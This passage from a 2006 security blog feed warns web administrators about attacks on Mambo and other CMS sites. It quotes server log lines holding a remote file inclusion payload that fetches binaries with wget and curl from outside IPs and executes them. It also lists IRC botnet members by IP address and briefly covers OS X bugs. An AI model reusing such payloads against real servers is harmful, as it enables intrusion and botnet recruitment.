#mambolizo TDMVTPAQ H ~MXRRVGGE@82.165.37.165 (BARPIQB)<br />
#mambolizo TDUQZKXN H ~XAPAFYDJ@209.216.245.146 (PVOOD)<br />
#mambolizo TEYTUIAP H ~YVFF@81.190.195.44 (EVLVIVRP)<br />
#mambolizo TFNX H ~RSQPBS@82.151.192.61 (RSKLC)<br />
#mambolizo THAQRBF H ~PQXZMFG@84.157.157.8 (OSXP)<br />
#mambolizo TKFWFFW H ~GOPC@147.123.155.1 (MVQNLUW)<br />
#mambolizo TKRKMOWV H ~AMFVAX@213.55.30.241 (CRJO)<br />
#mambolizo TMEAMDQ H ~NTBMC@201.252.133.28 (EOVXNYS)<br />
#mambolizo TMKUCU H ~MDAPF@202.143.162.98 (DUQANROU)<br />
#mambolizo TOFQVCBJ H ~ZSKUYBYN@84.149.127.173 (YMUPV)<br />
#mambolizo TOFQVCBJ H ~ZSKUYBYN@84.149.95.234 (YMUPV)<br />
#mambolizo TPMIJD H ~YGUFM@130.94.124.180 (IBVJLDOI)<br />
#mambolizo TRBTSS H ~AHMT@84.19.188.50 (FHTYM)<br />
#mambolizo TROPYYWG H ~NZWO@203.55.23.201 (ABATV)<br />
#mambolizo TUCJQB H ~PQZWTXZ@83.18.171.82 (EGVFI)<br />
#mambolizo TXJRS H ~AGFHDY@67.161.213.233 (KYDT)<br />
#mambolizo UBAG H ~MIKSLQWA@69.56.145.164 (IYUL)<br />
#mambolizo UDEBAS H ~BFWLLE@217.157.235.41 (EOJDZU)<br />
#mambolizo UGMNX H ~PVJKLW@203.55.23.201 (ANWOSOAK)<br />
#mambolizo UGMNX H ~PVJKLW@203.55.23.51 (ANWOSOAK)<br />
#mambolizo ULOV H ~PJOHXM@64.8.101.98 (IHFAMPE)<br />
#mambolizo UMBAVBD H ~PULOQIE@201.135.134.24 (VYDWNXFO)<br />
#mambolizo UPJREYD H ~WQUG@203.214.54.20 (ELEWRN)<br />
#mambolizo UVPTWOUH H ~DZWC@147.102.101.91 (ESVQ)<br />
#mambolizo VAZY H ~QPXYKO@203.55.23.51 (GMAIMGYH)<br />
#mambolizo VDWD H ~CXRCMW@68.18.93.131 (MSOZRSR)<br />
#mambolizo VEMQW H ~OGAZRKS@130.94.124.180 (FMALIBDI)<br />
#mambolizo VFKRTQK H ~CPUYPZV@69.40.247.160 (BWFQ)<br />
#mambolizo VKYPGN H ~RVTRABT@193.157.66.96 (JFVEWAPY)<br />
#mambolizo VNPE H ~TFTH@213.55.30.241 (CFXTI)<br />
#mambolizo VVPGC H ~VPGL@82.151.199.57 (SEDXUJTO)<br />
#mambolizo VYPUVJJ H &nbsp;<a href="mailto:apache@148.244.169.141" title="mailto:apache@148.244.169.141">apache at 148.244.169.141</a> (BCTF)<br />
#mambolizo VZBQBK H ~DMZJJKEN@69.196.142.78 (DYPMFCGI)<br />
#mambolizo WEANO H ~PCXCXWEG@83.18.171.82 (CWNVDO)<br />
#mambolizo WKFJYXMW H ~WWBB@212.98.165.220 (HQSKN)<br />
#mambolizo WQYEGXY H ~TIUSRLG@83.133.81.92 (KXCFM)<br />
#mambolizo WSIJLO H ~BIXU@130.94.124.180 (YCUQQHZ)<br />
#mambolizo WTPDHZ H ~PUSWTV@69.60.124.43 (TJVPZCLQ)<br />
#mambolizo WVEAKNI H ~PRHBM@204.1.16.2 (ZIJALNH)<br />
#mambolizo WVHQX H ~PZGUAAQD@82.236.226.54 (JFOOWP)<br />
#mambolizo WZHSWZE H ~VWSBA@24.31.6.188 (DWXDOXF)<br />
#mambolizo XACGE H ~PVKI@213.60.56.216 (JTDEML)<br />
#mambolizo XBCYE H ~JSBRQ@193.157.66.96 (CQXQY)<br />
#mambolizo XBGMKWFT H ~XVEJLF@202.172.239.112 (HJUJPF)<br />
#mambolizo XCKHTC H ~VJTSL@219.94.130.26 (DTVGLPGL)<br />
#mambolizo XICWY H ~HBZVYDZY@24.63.215.68 (TKQIVHC)<br />
#mambolizo XNAOKHY H ~UVLH@85.53.64.206 (VPHOIOM)<br />
#mambolizo XPMIJ H ~RCXMIP@67.53.244.228 (KJLM)<br />
#mambolizo XQIQR H ~JZWRVZW@206.33.2.132 (OHAY)<br />
#mambolizo XTDWV H ~SFHVQA@203.55.23.201 (KYQPKBJ)<br />
#mambolizo XTDWV H ~SFHVQA@203.55.23.51 (KYQPKBJ)<br />
#mambolizo XVADU H ~SPJR@217.206.217.199 (SMMXING)<br />
#mambolizo XXVOR H ~MEUVLICC@194.106.17.163 (KGOZT)<br />
#mambolizo YBHDN H ~ANSRK@69.60.124.43 (PCMT)<br />
#mambolizo YCWVOQS H ~VAHAR@213.225.48.85 (YEAQJL)<br />
#mambolizo YDRBQVP H ~KHHGR@202.71.143.2 (EKJRWSD)<br />
#mambolizo YEYMEGHV H ~LCQYVW@84.149.127.173 (JJDB)<br />
#mambolizo YEYMEGHV H ~LCQYVW@84.149.95.234 (JJDB)<br />
#mambolizo YFADXOXO H ~RIRY@82.226.118.139 (FOBA)<br />
#mambolizo YGTGW H ~GJAX@80.32.194.218 (LKIWEUOI)<br />
#mambolizo YKBEJBR H ~NWCK@203.219.147.14 (WDQHWIYX)<br />
#mambolizo YLBIVW H ~DHMM@84.255.202.157 (MIBEYIW)<br />
#mambolizo YQTTOQGI H ~RGQNUXW@85.234.143.14 (AJFO)<br />
#mambolizo YRODPMA H ~NSPLIXE@82.226.252.2 (UQVTRTFM)<br />
#mambolizo YYNN H ~WJTKTGY@67.161.213.233 (JRXX)<br />
#mambolizo ZJZYZNIZ H ~VMFIZB@66.77.26.70 (BJOETM)<br />
#mambolizo ZMYJZRMN H ~SSTLZW@81.223.209.211 (RGAOYT)<br />
#mambolizo ZNEV H ~LABU@202.143.162.98 (UEFA)<br />
#mambolizo ZOIA H ~VMMHAW@151.1.140.34 (XGTEB)<br />
#mambolizo ZXNLPD H ~SLIBKNS@82.146.17.37 (ROHJSIC)<br />
#mambolizo ZZCHGQ H ~OUPNMIZQ@83.138.146.85 (DCEHMJE)</p>
<p>If you are on this list format, reinstall now.</p>
]]></content:encoded>
			<wfw:commentRss>http://blogs.law.harvard.edu/zeroday/2006/06/05/more-attacks-on-my-web-server/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-sa/3.0/</creativeCommons:license>
	</item>
		<item>
		<title>Interesting attacks on my web server</title>
		<link>http://blogs.law.harvard.edu/zeroday/2006/05/05/interesting-attacks-on-my-web-server/</link>
		<comments>http://blogs.law.harvard.edu/zeroday/2006/05/05/interesting-attacks-on-my-web-server/#comments</comments>
		<pubDate>Fri, 05 May 2006 15:06:15 +0000</pubDate>
		<dc:creator>zeroday</dc:creator>
				<category><![CDATA[Vulnerabilities]]></category>

		<guid isPermaLink="false">http://blogs.law.harvard.edu/zeroday/2006/05/05/interesting-attacks-on-my-web-server/</guid>
		<description><![CDATA[
Still think that firewall is enough to protect your web server?  Port 80 to the rescue!
Through a combination of curl, wget and various shell commands this &#8220;URL&#8221; is a sneaky little rootkit.  I haven&#8217;t had time to download the executables and rip them apart but something tells me that after all is said [...]]]></description>
			<content:encoded><![CDATA[<p><a name="a59"></a></p>
<p>Still think that firewall is enough to protect your web server?  Port 80 to the rescue!<br />
Through a combination of curl, wget and various shell commands this &#8220;URL&#8221; is a sneaky little rootkit.  I haven&#8217;t had time to download the executables and rip them apart but something tells me that after all is said and done&#8230; you end up on some IRC server in Brazil.  Call it a hunch.</p>
<p>130.227.55.243 &#8211; - [25/Apr/2006:10:08:10 -0700] &#8220;GET /index2.php?option=com_content&amp;do_pdf=1&amp;id=1index2.php?_REQUEST[option]=com_content&amp;_REQUEST[Itemid]=1&amp;GLOBALS=&amp;mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&amp;cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo|  HTTP/1.1&#8243; 404 1044 &#8220;-&#8221; &#8220;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)&#8221;130.227.55.243 &#8211; - [25/Apr/2006:10:08:11 -0700] &#8220;GET /index.php?option=com_content&amp;do_pdf=1&amp;id=1index2.php?_REQUEST[option]=com_content&amp;_REQUEST[Itemid]=1&amp;GLOBALS=&amp;mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&amp;cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo|  HTTP/1.1&#8243; 404 1044 &#8220;-&#8221; &#8220;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)&#8221;130.227.55.243 &#8211; - [25/Apr/2006:10:08:12 -0700] &#8220;GET /mambo/index2.php?_REQUEST[option]=com_content&amp;_REQUEST[Itemid]=1&amp;GLOBALS=&amp;mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&amp;cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo|  HTTP/1.1&#8243; 404 1044 &#8220;-&#8221; &#8220;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)&#8221;</p>
<p>&nbsp;<a href="http://Seclists.org" title="http://Seclists.<br />
" target="_blank">Seclists.org</a> also noticed this traffic back in March.<br />
<a href="http://seclists.org/lists/fulldisclosure/2006/Mar/0176.html">All of them, as we can see, are exploitation attempts to known bugged<br />
pages (like the newest Mambo bug, the old XMLRPC problem with old<br />
versions of Drupal, etc). I guess that they are getting a list of<br />
domain names and trying them out with those vulns, and I believe that<br />
they may already have some thousands of vuln machines in their hands.<br />
Such attacks might been enhanced by using Google to guess which<br />
domains are using which CMS&#8230; for example, looking on Google for &#8220;A<br />
password and instructions will be sent to this e-mail address, so make<br />
sure it is accurate.&#8221; will return a bunch of Drupal websites (88,500<br />
according to Google, even though we can see just the first 1000 ones). </p>
<p>This is just an advise for all admins that use those CMS, to keep, as<br />
always, your CMS updated (almost every two weeks there are new vulns<br />
disclosed), and also, check if you already got caught by that, if<br />
you&#8217;re running old software. </p>
<p></a></p>
<p>The most interesting comment here is the use of Google to hone the attacks.  There is even a book on the market that talks about hacking with google.  One of the more novel methods was extracting credit card numbers.  Before anyone wonders <a href="http://news.com.com/Suit+accuses+Google+of+profiting+from+child+porn/2100-1030_3-6069014.html">whether Google gets sued </a> over the random crimes committed by others using Google look no further.</p>
<p>More details found on a forum regarding the make up of this root kit:<br />
<a href="http://www.mail-archive.com/botnets@whitestar.linuxbox.org/msg00334.html"></p>
<pre>
 another botnet irc client:
&nbsp;<a href="http://210.3.4.193/cmd.txt" title="http://210.3.4.193/cmd.txt" target="_blank">http://210.3.4.193/cmd.txt</a>
</pre>
<p></a></p>
]]></content:encoded>
			<wfw:commentRss>http://blogs.law.harvard.edu/zeroday/2006/05/05/interesting-attacks-on-my-web-server/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-sa/3.0/</creativeCommons:license>
	</item>
		<item>
		<title>Latest on OS X research</title>
		<link>http://blogs.law.harvard.edu/zeroday/2006/05/01/latest-on-os-x-research/</link>
		<comments>http://blogs.law.harvard.edu/zeroday/2006/05/01/latest-on-os-x-research/#comments</comments>
		<pubDate>Tue, 02 May 2006 03:28:49 +0000</pubDate>
		<dc:creator>zeroday</dc:creator>
				<category><![CDATA[Vulnerabilities]]></category>

		<guid isPermaLink="false">http://blogs.law.harvard.edu/zeroday/2006/05/01/latest-on-os-x-research/</guid>
		<description><![CDATA[
Tom Ferris, noted security researcher, has listed a series of new bugs to come out for OS X.  it&#8217;s an interesting mixture of bugs which consists of mostly Heap Overflows.  This is scary for those who would like to think that their OS X machine is 100% safe from malware.  The media [...]]]></description>
			<content:encoded><![CDATA[<p><a name="a54"></a></p>
<p>Tom Ferris, noted security researcher, has listed a series of new bugs to come out for OS X.  it&#8217;s an interesting mixture of bugs which consists of mostly Heap Overflows.  This is scary for those who would like to think that their OS X machine is 100% safe from malware.  The media doesn&#8217;t always help with alarmist reactions and Apple doesn&#8217;t help much with it&#8217;s defensive posture.  The truth, as is almost always the case, lies in the parallax of the two sources.  OS X has received a lot more attention these days and thus more bugs have been found.  While the technical underpinnings of OS X *are* in fact more solid then Windows it doesn&#8217;t mean that the OS is &#8220;virus free&#8221; or &#8220;immune from hackers/crackers/etc&#8221;.</p>
]]></content:encoded>
			<wfw:commentRss>http://blogs.law.harvard.edu/zeroday/2006/05/01/latest-on-os-x-research/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-sa/3.0/</creativeCommons:license>
	</item>
	</channel>
</rss>
